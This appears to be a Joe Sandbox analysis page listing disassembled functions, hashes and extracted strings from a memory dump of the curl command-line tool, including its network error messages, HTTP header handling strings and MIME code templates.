Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
Instruction ID: 883c7011e575ea5a7c6f4c1f9142758a7dd406aee71d2c359fd0fba37dfae8a8
Opcode Fuzzy Hash: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
Instruction Fuzzy Hash: 28024B3A651F84ABEA8C9F61E6A43DD7364F789B81F440519DF6A83351EF38A175C300

Function 000000013F49E524 Relevance: 76.7, APIs: 1, Strings: 50, Instructions: 229stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,000000013F49EA2A), ref: 000000013F49E8E8

Strings

No data record of requested type, xrefs: 000000013F49E8BD
Host not found, xrefs: 000000013F49E8D8
Timed out, xrefs: 000000013F49E7AF
Address family not supported, xrefs: 000000013F49E666
Connection refused, xrefs: 000000013F49E7FA
Winsock version not supported, xrefs: 000000013F49E84E
Address already in use, xrefs: 000000013F49E6AE
Out of file descriptors, xrefs: 000000013F49E586
Socket is not connected, xrefs: 000000013F49E78B
Connection was reset, xrefs: 000000013F49E716
Disconnected, xrefs: 000000013F49E899
Not empty, xrefs: 000000013F49E890
Protocol is unsupported, xrefs: 000000013F49E696
Loop??, xrefs: 000000013F49E7EE
Socket has been shut down, xrefs: 000000013F49E77F
Call interrupted, xrefs: 000000013F49E5C2
Bad argument, xrefs: 000000013F49E59E
Remote error, xrefs: 000000013F49E863
Too many references, xrefs: 000000013F49E773
Network has been reset, xrefs: 000000013F49E6E6
No buffer space, xrefs: 000000013F49E7A3
Winsock library not initialised, xrefs: 000000013F49E842
Address not available, xrefs: 000000013F49E70A
Unrecoverable error in call to nameserver, xrefs: 000000013F49E8C6
Need destination address, xrefs: 000000013F49E606
Bad message size, xrefs: 000000013F49E5FA
Process limit reached, xrefs: 000000013F49E887
Host down, xrefs: 000000013F49E7D6
Host unreachable, xrefs: 000000013F49E806
Operation not supported, xrefs: 000000013F49E67E
Connection was aborted, xrefs: 000000013F49E6DA
Something is stale, xrefs: 000000013F49E86C
Bad quota, xrefs: 000000013F49E875
Too many users, xrefs: 000000013F49E87E
Bad file, xrefs: 000000013F49E5B6
Descriptor is not a socket, xrefs: 000000013F49E612
Protocol family not supported, xrefs: 000000013F49E672
Name too long, xrefs: 000000013F49E7E2
Call would block, xrefs: 000000013F49E5CE
Socket is already connected, xrefs: 000000013F49E797
Socket is unsupported, xrefs: 000000013F49E68A
Host not found, try again, xrefs: 000000013F49E8CF
Invalid arguments, xrefs: 000000013F49E592
Network down, xrefs: 000000013F49E6FE
Blocking call in progress, xrefs: 000000013F49E61E
Protocol option is unsupported, xrefs: 000000013F49E6A2
Bad protocol, xrefs: 000000013F49E62A
Network unreachable, xrefs: 000000013F49E6F2
Winsock library is not ready, xrefs: 000000013F49E85A
Bad access, xrefs: 000000013F49E5AA

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncpy
String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
API String ID: 3301158039-3442644082
Opcode ID: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
Instruction ID: 0640c7bf71eaf01a69bd210060d0124d24aeb7476050d4bbad2f38d1ae4e3381
Opcode Fuzzy Hash: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
Instruction Fuzzy Hash: 8BB17871F4460091FAADDBAC996CBFB1661B341380F95D13DD10A069F8A76DCF8BA321

Function 000000013F4BAA98 Relevance: 56.5, APIs: 3, Strings: 29, Instructions: 459stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F493884: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,000000013F485A63), ref: 000000013F49389D

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F4BB6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F4BAE05
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F4BB6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F4BAF43
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F4BB6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F4BAF56

Strings

Overflow Content-Length: value, xrefs: 000000013F4BAB6E
Content-Type:, xrefs: 000000013F4BAB96
Content-Encoding:, xrefs: 000000013F4BAD81
Negotiate: noauthpersist -> %d, header part: %s, xrefs: 000000013F4BB0FB
Content-Range:, xrefs: 000000013F4BAE2C
Strict-Transport-Security:, xrefs: 000000013F4BB1D3
Last-Modified:, xrefs: 000000013F4BAFBB
Maximum file size exceeded, xrefs: 000000013F4BAB4B
HTTP/1.0 proxy connection set to keep alive, xrefs: 000000013F4BAC35
Transfer-Encoding:, xrefs: 000000013F4BAD29
Retry-After:, xrefs: 000000013F4BADBF
WWW-Authenticate:, xrefs: 000000013F4BB00C
Proxy-Connection:, xrefs: 000000013F4BAC14, 000000013F4BAC6B
Illegal STS header skipped, xrefs: 000000013F4BB211
keep-alive, xrefs: 000000013F4BAC05, 000000013F4BACA3
Set-Cookie:, xrefs: 000000013F4BAEEC
close, xrefs: 000000013F4BAC5C, 000000013F4BACDF
HTTP/1.0 connection set to keep alive, xrefs: 000000013F4BACD3
localhost, xrefs: 000000013F4BAF29
127.0.0.1, xrefs: 000000013F4BAF39
Proxy-authenticate:, xrefs: 000000013F4BB03B
Location:, xrefs: 000000013F4BB146
[::1], xrefs: 000000013F4BAF4C
Invalid Content-Length: value, xrefs: 000000013F4BAB7A
HTTP/1.1 proxy connection set close, xrefs: 000000013F4BAC8E
Persistent-Auth:, xrefs: 000000013F4BB0A6
Content-Length:, xrefs: 000000013F4BAADE
Connection:, xrefs: 000000013F4BACB2, 000000013F4BACEE
false, xrefs: 000000013F4BB0E0

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strcmp$_errno_time64
String ID: 127.0.0.1$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$HTTP/1.0 connection set to keep alive$HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Illegal STS header skipped$Invalid Content-Length: value$Last-Modified:$Location:$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$Retry-After:$Set-Cookie:$Strict-Transport-Security:$Transfer-Encoding:$WWW-Authenticate:$[::1]$close$false$keep-alive$localhost
API String ID: 1495474129-986724021
Opcode ID: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction ID: 36f12913b058abb9c4e2c1d594a1a65f0bd4de8ea6d1b0ad4c3fcaf172bd07e9
Opcode Fuzzy Hash: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction Fuzzy Hash: 8E229C31B0878896FB68DB25A5543EB2BA1A745B84F44403DDE990B797EF38CB5BC700

Function 000000013F49EB80 Relevance: 43.9, APIs: 10, Strings: 15, Instructions: 129stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EBAC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EBB4
__swprintf_l.LIBCMT ref: 000000013F49EFE0
__swprintf_l.LIBCMT ref: 000000013F49F021
__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_I_COMPLETE_NEEDED, xrefs: 000000013F49EF85
SEC_I_SIGNATURE_NEEDED, xrefs: 000000013F49EFEA
SEC_I_LOCAL_LOGON, xrefs: 000000013F49EF6D
CRYPT_E_REVOKED, xrefs: 000000013F49EF39
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 000000013F49F005
SEC_I_CONTEXT_EXPIRED, xrefs: 000000013F49EFA0
SEC_I_CONTINUE_NEEDED, xrefs: 000000013F49EF8E
SEC_I_COMPLETE_AND_CONTINUE, xrefs: 000000013F49EF79
No error, xrefs: 000000013F49EF97
SEC_I_NO_LSA_CONTEXT, xrefs: 000000013F49EFF3
SEC_I_RENEGOTIATE, xrefs: 000000013F49EFFC
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
Unknown error, xrefs: 000000013F49EFC2
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 000000013F49EFD6

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$strncpy
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 3653662010-131313631
Opcode ID: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction ID: 95009903f527c9a730f02199ad0d0080757b68bb9efbe3ad1e0a7a90dc22e0b4
Opcode Fuzzy Hash: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction Fuzzy Hash: 64515C31B14B44D6F764DF24A418BEB2364B784794F84413EEA4A42AE9EB3CCB4BC350

Function 000000013F485094 Relevance: 40.7, APIs: 18, Strings: 5, Instructions: 488COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4850E8
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F485103
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48512D
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48523E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4852B1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F485768

Part of subcall function 000000013F483E98: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F483EAF

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48578A
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F4857BF
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F485815
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48585A

Strings

out of memory!, xrefs: 000000013F48511F, 000000013F4851D8, 000000013F485257, 000000013F485400, 000000013F485472, 000000013F48548F, 000000013F4854AC, 000000013F4854D5, 000000013F4855AE, 000000013F485675, 000000013F48571F, 000000013F4857A3, 000000013F4857D4, 000000013F48582E
error while reading standard input, xrefs: 000000013F485455, 000000013F485622
Illegally formatted input field!, xrefs: 000000013F48584B
garbage at end of field specification: %s, xrefs: 000000013F4857F2
no multipart to terminate!, xrefs: 000000013F485290

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _strdup$free$calloc
String ID: Illegally formatted input field!$error while reading standard input$garbage at end of field specification: %s$no multipart to terminate!$out of memory!
API String ID: 2131083229-1760322783
Opcode ID: afa76903f49d8822fbc27f4966aa7366cad368ee363a5310e7af25668910d2cf
Instruction ID: 8fb5161416bc47a5e38ebd611e0ff1367acd5250049069d0498b988bbea3fd74
Opcode Fuzzy Hash: afa76903f49d8822fbc27f4966aa7366cad368ee363a5310e7af25668910d2cf
Instruction Fuzzy Hash: 31324736A02B4085EB50DF61E5903DE2BA1FB48BA8F44413ADE4D577A9EF3AC656C340

Function 000000013F481060 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 251fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481155

Part of subcall function 000000013F493014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,000000013F4810B6), ref: 000000013F493026

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F4810C9
_localtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 000000013F4810FE
__swprintf_l.LIBCMT ref: 000000013F48112E
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481179
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481206
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481217
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4812CC
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481318
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F481354

Strings

%02d:%02d:%02d.%06ld , xrefs: 000000013F481108
[%zu bytes data], xrefs: 000000013F481251
Failed to create/open output, xrefs: 000000013F481198
<= Recv header, xrefs: 000000013F4813C6
=> Send header, xrefs: 000000013F4813BD
=> Send data, xrefs: 000000013F4813AB
%s== Info: %.*s, xrefs: 000000013F4813F8
<= Recv data, xrefs: 000000013F4813B4
<= Recv SSL data, xrefs: 000000013F4813A2
%s%s , xrefs: 000000013F481242, 000000013F4812AC, 000000013F4812F8, 000000013F48133C
=> Send SSL data, xrefs: 000000013F481399

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfwrite$CounterPerformanceQuery__swprintf_l_localtime64_time64fopen
String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]
API String ID: 1912876713-628975109
Opcode ID: b9d0b44b04281de3e993758ab3a9aa0ff43244bf24c44a1db3928ec2c28984e2
Instruction ID: 5b65ceb8ca827e5e99b8b49aba19df1e1094e36be3ee80c11d3a0e2790b12ef6
Opcode Fuzzy Hash: b9d0b44b04281de3e993758ab3a9aa0ff43244bf24c44a1db3928ec2c28984e2
Instruction Fuzzy Hash: 4BB18172E0478495FB649F65E8407EB7FA1B799784F48413ED94903AA6DB39C74BC300

Function 000000013F4820D0 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 160filestringCOMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F482130
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F48218C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4821CE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4821E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482200
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F48221E
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F482229
__swprintf_l.LIBCMT ref: 000000013F482250
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F482273
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0 ref: 000000013F48229D
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4822AD
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F4822BE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4822CC
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4822D4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F4822F7

Strings

out of memory, xrefs: 000000013F48213D, 000000013F4821EE
Failed to open the file %s: %s, xrefs: 000000013F4822DD
Remote filename has no length!, xrefs: 000000013F482313
%s/%s, xrefs: 000000013F482129
overflow in filename generation, xrefs: 000000013F4821D4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$free$__swprintf_l_close_fdopen_scwprintffopenmallocstrerror
String ID: %s/%s$Failed to open the file %s: %s$Remote filename has no length!$out of memory$overflow in filename generation
API String ID: 1133054535-2634015058
Opcode ID: 1eb40259cfd566c913bb30b643496795ea4b9ae0ab2147496de2761874fb85e5
Instruction ID: 072106a9876964402a80a94d1b6c3f4329fb34c35c1e8e9e0ec19190f6124424
Opcode Fuzzy Hash: 1eb40259cfd566c913bb30b643496795ea4b9ae0ab2147496de2761874fb85e5
Instruction Fuzzy Hash: 2761AC31A04A8095FB249F21E8143EB7BA0B755BA4F948638DE69077D6EB7DC747C301

Function 000000013F482C1C Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F482C49
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482C63
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F482C85
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F482CA4
__swprintf_l.LIBCMT ref: 000000013F482D28
_mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 000000013F482D30
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F482D3A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F482D45
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F482D5B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482DC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F482DCD

Strings

The directory name %s is too long., xrefs: 000000013F482D8F
Error creating directory %s., xrefs: 000000013F482D7B
You don't have permission to create %s., xrefs: 000000013F482DAA
Cannot create directory %s because you exceeded your quota., xrefs: 000000013F482D82
No space left on the file system that will contain the directory %s., xrefs: 000000013F482DA1
%s%s, xrefs: 000000013F482D21
%s resides on a read-only file system., xrefs: 000000013F482D98

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: _errno$freestrtok$__swprintf_l_mkdir_strdupmalloc
String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
API String ID: 3627321920-1086585624
Opcode ID: 1a0f5bedf01f1df748cd9b1e86a6477a94acc7d40ee8a33282097975f92045f0
Instruction ID: 9da310f970793276d22b62854b5df2f03ad7ab5e2a7af3eab2926d6c29d30f57
Opcode Fuzzy Hash: 1a0f5bedf01f1df748cd9b1e86a6477a94acc7d40ee8a33282097975f92045f0
Instruction Fuzzy Hash: 9451DE30A0574085FB559F25E9103EB7BE0AB95BA0F944639DD2A037E5EB3DCB47C220

Function 000000013F4919A0 Relevance: 30.2, APIs: 6, Strings: 14, Instructions: 229COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491B93
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491BD9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491C20
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491C68

Part of subcall function 000000013F4919A0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491CF1

Part of subcall function 000000013F4913AC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F491406

Strings

curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 000000013F491A58
part%d = curl_mime_addpart(mime%d);, xrefs: 000000013F4919E6
curl_mime_encoder(part%d, "%s");, xrefs: 000000013F491BB5
curl_mime_subparts(part%d, mime%d);, xrefs: 000000013F491B52
curl_mime_headers(part%d, slist%d, 1);, xrefs: 000000013F491CC0
mime%d = NULL;, xrefs: 000000013F491B70
curl_mime_type(part%d, "%s");, xrefs: 000000013F491C8A
curl_mime_filename(part%d, NULL);, xrefs: 000000013F491AD2
curl_mime_filedata(part%d, "%s");, xrefs: 000000013F491AA4
(curl_seek_callback) fseek, NULL, stdin);, xrefs: 000000013F491A6E
slist%d = NULL;, xrefs: 000000013F491CDD
curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 000000013F491B15
curl_mime_filename(part%d, "%s");, xrefs: 000000013F491BFA
curl_mime_name(part%d, "%s");, xrefs: 000000013F491C42

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$malloc
String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
API String ID: 2190258309-2644548734
Opcode ID: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
Instruction ID: 044487cb0ead359631abb08d97820270ecfee865a47d3c8a1b46aaca82da3802
Opcode Fuzzy Hash: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
Instruction Fuzzy Hash: 6E917C34B1070152FA659B6AD9553EB27E1BB85BE0F40463EDD6D87BE5FE29CB028300

Function 000000013F492310 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 279stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4923AB
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F4923BF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F4923C8
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,00000000,?,00000000,?,000000013F492979), ref: 000000013F492506
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F49251B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F492524
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F492587
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F49259C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F4925A5
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F4925BC
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F492979), ref: 000000013F4925D1
